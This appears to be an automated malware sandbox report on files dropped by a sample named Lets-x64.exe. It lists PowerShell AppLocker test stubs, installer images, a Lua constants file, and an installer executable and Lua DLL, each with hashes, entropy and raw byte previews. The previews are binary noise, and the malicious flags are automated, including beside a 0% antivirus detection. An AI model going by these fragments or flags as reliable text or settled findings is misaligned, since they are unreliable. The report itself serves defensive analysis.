                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2gf1y5q.gbz.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5cod4jj.qn2.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tu0thraw.0qm.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1gywd1c.tzl.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ug0tnvj1.4ih.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upnpfove.1zi.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvzzgrks.os0.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_veexdkgh.fsl.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vifzzbgp.3d0.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whec22ms.pez.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wiabgczi.1m1.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wid4zmnu.40p.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnkhoboy.4au.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wquavhrl.s3m.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvlakvvq.bj2.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaw5zznj.5a0.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl3pzqbr.44g.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zf1yqu44.zss.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 497x63, components 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2362
                                                                                                                  Entropy (8bit):7.670995643119166
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:o9YMAuERADl78E1g3e2OHBTTxE4+NaEIT9paYvo6su:gh7EQVXgt+NYgTnw6X
                                                                                                                  MD5:3220A6AEFB4FC719CC8849F060859169
                                                                                                                  SHA1:85F624DEBCEFD45FDFDF559AC2510A7D1501B412
                                                                                                                  SHA-256:988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
                                                                                                                  SHA-512:5C45EA8F64B3CDFB262C642BD36B08C822427150D28977AF33C9021A6316B6EFED83F3172C16343FD703D351AF3966B06926E5B33630D51B723709712689881D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......?...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...T.).*.{-.I.U..i.*.P.U....)..J..9..A*@.(Lu..k...5R.T......}..E&..$.O.P}..@>.}..L....,.....t......c...ar.Z\.....R...7 .....z......k.OS.Q.'....r..?...4.x...P.G*..y....L.........|....;z.a.4......SL...S.!.d+.3.....w..)..i.....{.......Hi....)._.~..q/..Ji..v@<.....ne......j..q..Q.C..}G.L".5I!]........._E..")..*..1.....SM...qj...j1.+...n..M:..C..j.H.....;...N..

                                                                                                                  C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPG

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS2 Windows, datetime=2008:07:08 14:20:15], baseline, precision 8, 166x312, components 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):29054
                                                                                                                  Entropy (8bit):5.195708227193176
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:wjV66AV66RU53DaYNg7y5fJ+dwd7L/dSivXHk4eo:wjs6As6R4aYyCfToi7R
                                                                                                                  MD5:AC40DED6736E08664F2D86A65C47EF60
                                                                                                                  SHA1:C352715BBF5AE6C93EEB30DF2C01B6F44FAEDAAA
                                                                                                                  SHA-256:F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
                                                                                                                  SHA-512:2FBD1C6190743EA9EF86F4CB805508BD5FFE05579519AFAFB55535D27F04F73AA7C980875818778B1178F8B0F7C6F5615FBF250B78E528903950499BBE78AC32
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS2 Windows.2008:07:08 14:20:15........................................8...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................U.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...J....X.Z..l.i.........jl....p..........*..\\.I<...=..v.....(..A.%.P.'!."UI.I....z.u...wq..*..hc4kt.6R.7H.Z.[.#O..O

                                                                                                                  C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.dat

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):161070
                                                                                                                  Entropy (8bit):5.980129219920683
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:7AW0HGl6b15gOHTuZZcwbMy1IrX4+ofXXkk/:70TYfXU0
                                                                                                                  MD5:255D1FD903FFCB8D3001A313ED66B785
                                                                                                                  SHA1:6BEC09746DE218C108AB0EE78BBAF33CE6B04E7A
                                                                                                                  SHA-256:9005060548FB2AD85C0554B67CDB3B015E9A898A63E2B0D2352E09A29FD8A797
                                                                                                                  SHA-512:A20154B803A2B46F2625D2C2108054AC440F2B50F3282AE8A64B9E40E8C478EEE98021199B7BE258260048C60E4D39368E552D0448EF4B369118C1DA159EC06B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:........CGlobalIncludeLuaFile.........Constant Definitions..XMB_OK=0;..MB_OKCANCEL=1;..MB_ABORTRETRYIGNORE=2;..MB_YESNOCANCEL=3;..MB_YESNO=4;..MB_RETRYCANCEL=5;..MB_ICONNONE=0;..MB_ICONSTOP=16;..MB_ICONQUESTION=32;..MB_ICONEXCLAMATION=48;..MB_ICONINFORMATION=64;..MB_DEFBUTTON1=0;..MB_DEFBUTTON2=256;..MB_DEFBUTTON3=512;..IDOK=1;..IDCANCEL=2;..IDABORT=3;..IDIGNORE=5;..IDRETRY=4;..IDYES=6;..IDNO=7;..SW_HIDE=0;..SW_SHOWNORMAL=1;..SW_NORMAL=1;..SW_MAXIMIZE=3;..SW_MINIMIZE=6;..HKEY_CLASSES_ROOT=0;..HKEY_CURRENT_CONFIG=1;..HKEY_CURRENT_USER=2;..HKEY_LOCAL_MACHINE=3;..HKEY_USERS=4;..REG_NONE=0;..REG_SZ=1;..REG_EXPAND_SZ=2;..REG_BINARY=3;..REG_DWORD=4;..REG_DWORD_LITTLE_ENDIAN=4;..REG_DWORD_BIG_ENDIAN=5;..REG_LINK=6;..REG_MULTI_SZ=7;..REG_RESOURCE_LIST=8;..REG_FULL_RESOURCE_DESCRIPTOR=9;..REG_RESOURCE_REQUIREMENTS_LIST=10;..DLL_CALL_CDECL=0;..DLL_CALL_STDCALL=1;..DLL_RETURN_TYPE_INTEGER=0;..DLL_RETURN_TYPE_LONG=1;..DLL_RETURN_TYPE_STRING=2;..SUBMITWEB_POST=0;..SUBMITWEB_GET=1;..ACCESS_READ=1310

                                                                                                                  C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\Lets-x64.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5153280
                                                                                                                  Entropy (8bit):6.264110671248182
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:aYjdIw1TJyn5PPXDFFCMvSn/yRe4AloH1/coSNs5QKvbeGktKpGw+BbwPiBqkd96:SPZYxnMe4V/cJtKpGvJc5twG
                                                                                                                  MD5:2A7D5F8D3FB4AB753B226FD88D31453B
                                                                                                                  SHA1:2BA2F1E7D4C5FF02A730920F0796CEE9B174820C
                                                                                                                  SHA-256:879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
                                                                                                                  SHA-512:FA520EBF9E2626008F479C6E8F472514980D105F917C48AD638A64177D77C82A651C34ED3F28F3E39E67F12E50920503B66E373B5E92CF606BC81DC62A6B3EA4
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5.....X.)......2......6......d/.........`...../..............".........4....d..+....d.......d+......d,.....Rich....................PE..d...3..O..........".......5...........%........@..............................P.....DAO...@.................................................H:H......pN.......K.|H...........0O..,....................................................5.....87H.@....................text....5.......5................. ..`.rdata..*.....5.......5.............@..@.data.........H......vH.............@....pdata..|H....K..J...~I.............@..@text....."....M..$....K.............@.. data.....K... N..L....K.............@..@.rsrc........pN......8L.............@..@.reloc.......0O.......L.............@..B........................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\Lets-x64.exe
                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):337224
                                                                                                                  Entropy (8bit):6.4846248169411185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:J8bKN/3dhtovc2LAmB7jQaHU9ZW5NpFaQIuHmc6/nEPn:JqKN/NhKEIzdjQaHUe7OaME
                                                                                                                  MD5:958103E55C74427E5C66D7E18F3BF237
                                                                                                                  SHA1:CEA3FC512763DC2BA1CFA9B7CB7A46AE89D9FCD8
                                                                                                                  SHA-256:3EA4A4C3C6DEA44D8917B342E93D653F59D93E1F552ACE16E97E43BB04E951D8
                                                                                                                  SHA-512:02ED6E1F24EF8F7F1C0377FA86A3A494B8A4474472AB7001F7902F2F3AFA6CD975DC69FCAB6F5524545A67657ECCCFCD4ED2C95431843E9D50F2FFF4C5178DBE
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
